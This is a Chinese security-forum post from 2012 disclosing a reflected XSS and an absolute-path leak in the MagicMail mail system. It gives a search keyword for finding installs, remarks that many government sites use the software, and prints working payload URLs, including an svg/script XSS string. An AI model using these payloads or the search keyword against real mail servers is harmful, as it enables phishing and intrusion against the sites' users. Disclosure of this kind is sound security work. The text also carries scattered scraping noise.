找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1917|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞& G3 m& k! B5 Z0 p

  J) ]; n" _; A5 }7 n- W 8 I' E  K! b8 k4 i
包含  一个反射性XSS  以及  绝对路径泄漏
( N9 m1 ]" ?3 N3 I看了看 貌似全部是linux的。: V+ Y( {- z& \( ]; [! ]7 {
: V7 J) G: r9 c) n; S
关键字:迈捷邮件系统 by MagicMail% l; _1 y; G5 P" W  r8 P: B
( v9 y4 A# L" {2 N. d( P
可以看到很多政府网站都用这个邮件系统
/ J7 {* M% b" V  M
- {7 u" A5 k) {- c% Y8 A2 i绝对路径 http://madman.in/index.php?login_type=declare&language=
& h9 f4 r8 ]3 u+ |9 R8 A9 W" l5 p$ ?7 ^" X4 u/ f

6 W, W# r2 d! B& \3 E
$ N' b2 ^% G" s5 j6 kXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E+ j! U7 b2 n: H( F( z8 _; |' _9 o

* l3 M7 t' R9 O* |  f
! \0 F. t4 K2 E: p- S% ]+ R* Z$ g. e, @& n' z, {
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
% Y0 P! U4 ?- r. t  N
$ v9 F- _( P. G) R修复方案:看官方补丁吧。9 ]) ~! b: c' {( o0 d8 j/ g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表